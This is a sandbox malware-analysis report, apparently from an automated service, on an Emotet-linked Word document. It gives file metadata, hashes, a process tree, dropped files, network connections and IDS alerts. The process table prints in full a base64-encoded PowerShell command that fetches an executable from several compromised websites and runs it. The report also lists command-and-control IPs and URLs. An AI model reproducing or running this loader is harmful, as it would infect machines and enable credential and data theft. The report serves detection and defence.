File name: | Data-5544-J5823545.doc |
Full analysis: | https://app.any.run/tasks/f75fc5d0-a70b-492b-8f0e-1805277d9193 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | June 03, 2019, 11:05:13 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: quantifying California Colorado, Subject: Handcrafted Rubber Car, Author: Karli Conroy, Comments: Soft overriding Squares, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Apr 30 21:06:00 2019, Last Saved Time/Date: Tue Apr 30 21:06:00 2019, Number of Pages: 1, Number of Words: 16, Number of Characters: 95, Security: 0 |
MD5: | 771825E462ADF9ECAEBA5A9010786D9E |
SHA1: | 4FC433A5A483CA7AD543C413D08C0D48ED67B9BC |
SHA256: | 05383088D0D46A5B5F4DE852703601A6C39F04844AB63A1850197FCB011F3C81 |
SSDEEP: | 3072:277HUUUUUUUUUUUUUUUUUUUTkOQePu5U8q8uM3xqsXcf/WW/KElqu:277HUUUUUUUUUUUUUUUUUUUT52VtuMIn |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Manager: | Marvin |
---|---|
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 110 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Cormier - Orn |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 95 |
Words: | 16 |
Pages: | 1 |
ModifyDate: | 2019:05:31 20:06:00 |
CreateDate: | 2019:05:31 20:06:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | Soft overriding Squares |
Keywords: | - |
Author: | Karli Conroy |
Subject: | Handcrafted Rubber Car |
Title: | quantifying California Colorado |
CompObjUserType: | Microsoft Word 97-2003 Document |
CompObjUserTypeLen: | 32 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3016 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Data-5544-J5823545.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3660 | powershell -nop -e JABSADMAWgB0AEsAQwA9ACcARgBDAGEAbQBzADMAUQAnADsAJABkADEAbQBVADAAYQB6AGQAIAA9ACAAJwAxADgANAAnADsAJABYAE0AegBVAHMAUAA9ACcAUABEADIAUQBpAHMAegBhACcAOwAkAHQAWgBUAEwAWAB6AFoAcQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAZAAxAG0AVQAwAGEAegBkACsAJwAuAGUAeABlACcAOwAkAHoAbABCAFUAcQA2AD0AJwBRADAASAB1AEUAdwBpACcAOwAkAHAAVABsADQASgB6AD0ALgAoACcAbgAnACsAJwBlACcAKwAnAHcALQBvAGIAagBlAGMAdAAnACkAIABuAEUAVAAuAFcAYABFAGIAQwBgAEwAaQBgAEUAbgB0ADsAJABOAFUAegBBAE0AQQBSAD0AJwBoAHQAdABwADoALwAvAGEAZwBhAHYAZQBhAC4AYwBvAG0ALgBiAHIALwBmAG8AbgB0AC8AdABNAGYAeQB4AHoATQBFAG4AUQAvAEAAaAB0AHQAcAA6AC8ALwBuAGUAdwBzAC0AdwBlAGUAawAuAHIAdQAvADIAMAAxADgALwB3AHYAcQA2AG4AegBkAF8AawB5AHcAZwBjAGoAegBnAGkALQAyADcAMwAvAEAAaAB0AHQAcAA6AC8ALwBhAGIALgBmAGkAdAB6AGkAbwAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAG8AcABpAEYAdABFAEEAcwBmAC8AQABoAHQAdABwADoALwAvAHAAYQBsAG0AYgBlAGEAYwBoAHIAZQBzAG8AcgB0AGMAZQBiAHUALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1AHAAbABvAGEAZABzAC8AdAA5AHMAbQBmAHEAagAzAF8AYgBsAG0ANAB4AG8ALQA2ADkANQAyADYAMQA5ADQALwBAAGgAdAB0AHAAOgAvAC8AdABoAGkAbgBnAHMAbQBhAGQAZQBmAG8AcgB5AG8AdQBhAHAAcABzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBWAHAAVgBPAFgAeABlAGsALwAnAC4AUwBQAEwAaQB0ACgAJwBAACcAKQA7ACQATgBPAEIASgBKAGoAPQAnAEUAbwAxAGoAcwB6AFIAUQAnADsAZgBvAHIAZQBhAGMAaAAoACQAagA1AFkAegByAFEASwBRACAAaQBuACAAJABOAFUAegBBAE0AQQBSACkAewB0AHIAeQB7ACQAcABUAGwANABKAHoALgBEAE8AdwBOAGwATwBBAEQAZgBpAEwAZQAoACQAagA1AFkAegByAFEASwBRACwAIAAkAHQAWgBUAEwAWAB6AFoAcQApADsAJABTAEgASABqADMAdgA9ACcATQBwAGkAXwBDAHoAMQBzACcAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAdABaAFQATABYAHoAWgBxACkALgBMAGUAbgBHAFQAaAAgAC0AZwBlACAAMwAxADQAMgAxACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBzAFQAYQByAFQAKAAkAHQAWgBUAEwAWAB6AFoAcQApADsAJABzADEARQBvAGsAbABSAD0AJwBmAEwAMgBkAHoAbQBJAGoAJwA7AGIAcgBlAGEAawA7ACQAVABRADAATgBTAHQATQBGAD0AJwBtAEEATgBGAHEAWQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABaAGkANwBsAEIATQA9ACcAcQBGAEwAYgBwAFUAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3728 | "C:\Users\admin\184.exe" | C:\Users\admin\184.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Media Player Exit code: 0 Version: 12.0.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3124 | --40a9642b | C:\Users\admin\184.exe | 184.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Media Player Exit code: 0 Version: 12.0.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2656 | "C:\Users\admin\AppData\Local\sansidaho\sansidaho.exe" | C:\Users\admin\AppData\Local\sansidaho\sansidaho.exe | 184.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Media Player Exit code: 0 Version: 12.0.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2640 | --a6fef274 | C:\Users\admin\AppData\Local\sansidaho\sansidaho.exe | sansidaho.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Media Player Exit code: 0 Version: 12.0.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3556 | "C:\Users\admin\AppData\Local\sansidaho\oDccNyQ7awhQkLyrC.exe" | C:\Users\admin\AppData\Local\sansidaho\oDccNyQ7awhQkLyrC.exe | — | sansidaho.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
1740 | --4c88963e | C:\Users\admin\AppData\Local\sansidaho\oDccNyQ7awhQkLyrC.exe | oDccNyQ7awhQkLyrC.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2400 | "C:\Users\admin\AppData\Local\sansidaho\sansidaho.exe" | C:\Users\admin\AppData\Local\sansidaho\sansidaho.exe | oDccNyQ7awhQkLyrC.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
252 | --a6fef274 | C:\Users\admin\AppData\Local\sansidaho\sansidaho.exe | sansidaho.exe | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
3016 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVREEC.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3660 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6L5XQY2HOXW41ULOPZC4.temp | — | |
MD5:— | SHA256:— | |||
2996 | sansidaho.exe | C:\Users\admin\Documents\Outlook Files\~Outlook Data File - NoMail.pst.tmp | — | |
MD5:— | SHA256:— | |||
2996 | sansidaho.exe | C:\Users\admin\Documents\Outlook Files\~Outlook.pst.tmp | — | |
MD5:— | SHA256:— | |||
2996 | sansidaho.exe | C:\Users\admin\Documents\Outlook Files\[email protected] | — | |
MD5:— | SHA256:— | |||
2996 | sansidaho.exe | C:\Users\admin\AppData\Local\Temp\4C59.tmp | — | |
MD5:— | SHA256:— | |||
3016 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:AAE1F34939203117AC1F4B1DA330748D | SHA256:A8522EFD13191ED100712611DBB7B818993A3A9AEE4584A1360605C4D2C4BD74 | |||
3016 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E2780B9C.wmf | wmf | |
MD5:637E164549D3997DC31678CEAF53908D | SHA256:6BDB8031E21919F33E86E119F7AD422BA78A32633731F43C26AB557C46F9AA01 | |||
3016 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BE87D3DE.wmf | wmf | |
MD5:4BE0853BED0B7E94E3EDCD5E0EEABF68 | SHA256:4171977F42801E3ECAF1CFCD9BF5E1C091D2470BC7FC331A55B406F324C52E83 | |||
3016 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:C7084271AB2630D08F8C2D581CA766D3 | SHA256:341C8F1AE60E17881E1349DC465C25B6326359E8B0FA2DA309A07F159121E0A7 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3660 | powershell.exe | GET | 404 | 187.45.193.203:80 | http://agavea.com.br/font/tMfyxzMEnQ/ | BR | xml | 1002 b | suspicious |
2640 | sansidaho.exe | POST | — | 82.15.36.209:443 | http://82.15.36.209:443/balloon/nsip/ | GB | — | — | malicious |
252 | sansidaho.exe | POST | — | 82.15.36.209:443 | http://82.15.36.209:443/tlb/ban/ringin/merge/ | GB | — | — | malicious |
2640 | sansidaho.exe | POST | 200 | 142.4.198.249:7080 | http://142.4.198.249:7080/ringin/cookies/ringin/ | CA | binary | 63.6 Kb | malicious |
3660 | powershell.exe | GET | 200 | 74.50.19.9:80 | http://ab.fitzio.com/cgi-bin/opiFtEAsf/ | US | executable | 261 Kb | suspicious |
252 | sansidaho.exe | POST | — | 81.109.227.123:80 | http://81.109.227.123/enable/ | GB | — | — | malicious |
2640 | sansidaho.exe | POST | — | 81.109.227.123:80 | http://81.109.227.123/cookies/add/ringin/merge/ | GB | — | — | malicious |
252 | sansidaho.exe | POST | 200 | 142.4.198.249:7080 | http://142.4.198.249:7080/iplk/entries/ | CA | binary | 252 Kb | malicious |
252 | sansidaho.exe | POST | 200 | 142.4.198.249:7080 | http://142.4.198.249:7080/prov/entries/ | CA | binary | 148 b | malicious |
3660 | powershell.exe | GET | 503 | 92.53.96.135:80 | http://news-week.ru/2018/wvq6nzd_kywgcjzgi-273/ | RU | html | 206 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3660 | powershell.exe | 92.53.96.135:80 | news-week.ru | TimeWeb Ltd. | RU | malicious |
3660 | powershell.exe | 187.45.193.203:80 | agavea.com.br | Locaweb Serviços de Internet S/A | BR | suspicious |
— | — | 81.109.227.123:80 | — | Virgin Media Limited | GB | malicious |
3660 | powershell.exe | 74.50.19.9:80 | ab.fitzio.com | Lunar Pages | US | suspicious |
2640 | sansidaho.exe | 142.4.198.249:7080 | — | OVH SAS | CA | malicious |
252 | sansidaho.exe | 82.15.36.209:443 | — | Virgin Media Limited | GB | malicious |
252 | sansidaho.exe | 142.4.198.249:7080 | — | OVH SAS | CA | malicious |
252 | sansidaho.exe | 81.109.227.123:80 | — | Virgin Media Limited | GB | malicious |
2640 | sansidaho.exe | 82.15.36.209:443 | — | Virgin Media Limited | GB | malicious |
Domain | IP | Reputation |
---|---|---|
agavea.com.br |
| suspicious |
news-week.ru |
| malicious |
ab.fitzio.com |
| suspicious |
dns.msftncsi.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
3660 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3660 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3660 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2640 | sansidaho.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2640 | sansidaho.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
2640 | sansidaho.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2640 | sansidaho.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
252 | sansidaho.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
252 | sansidaho.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
252 | sansidaho.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |